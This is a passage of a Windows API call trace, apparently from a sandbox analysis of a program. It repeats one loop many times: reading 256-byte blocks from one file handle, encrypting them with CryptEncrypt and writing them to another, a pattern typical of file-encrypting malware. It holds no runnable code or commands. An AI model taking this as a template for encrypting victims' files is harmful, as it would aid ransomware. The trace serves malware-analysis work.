pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.256] GetLastError () returned 0x0 [0162.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.256] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.256] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.256] GetLastError () returned 0x0 [0162.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.257] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.257] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.257] GetLastError () returned 0x0 [0162.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.257] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.257] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.257] GetLastError () returned 0x0 [0162.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.257] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.257] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.257] GetLastError () returned 0x0 [0162.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.257] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.257] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.257] GetLastError () returned 0x0 [0162.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.257] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.257] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.257] GetLastError () returned 0x0 [0162.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.257] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.258] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.258] GetLastError () returned 0x0 [0162.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.258] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.258] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.258] GetLastError () returned 0x0 [0162.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.258] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.258] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.258] GetLastError () returned 0x0 [0162.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.258] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.258] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.258] GetLastError () returned 0x0 [0162.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.258] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.258] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.258] GetLastError () returned 0x0 [0162.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.258] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.258] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.258] GetLastError () returned 0x0 [0162.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.258] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.259] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.259] GetLastError () returned 0x0 [0162.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.259] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.259] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.259] GetLastError () returned 0x0 [0162.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.259] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.259] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.259] GetLastError () returned 0x0 [0162.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.259] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.259] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.259] GetLastError () returned 0x0 [0162.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.259] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.259] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.259] GetLastError () returned 0x0 [0162.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.259] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.259] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.259] GetLastError () returned 0x0 [0162.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.259] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.260] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.260] GetLastError () returned 0x0 [0162.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.260] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.260] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.260] GetLastError () returned 0x0 [0162.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.260] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.260] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.260] GetLastError () returned 0x0 [0162.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.260] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.260] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.260] GetLastError () returned 0x0 [0162.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.260] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.260] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.260] GetLastError () returned 0x0 [0162.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.260] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.260] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.260] GetLastError () returned 0x0 [0162.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.260] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.260] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.260] GetLastError () returned 0x0 [0162.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.261] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.261] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.261] GetLastError () returned 0x0 [0162.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.261] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.261] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.261] GetLastError () returned 0x0 [0162.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.261] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.261] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.261] GetLastError () returned 0x0 [0162.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.261] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.261] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.261] GetLastError () returned 0x0 [0162.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.261] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.261] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.261] GetLastError () returned 0x0 [0162.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.261] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.261] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.261] GetLastError () returned 0x0 [0162.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.262] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.262] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.262] GetLastError () returned 0x0 [0162.262] 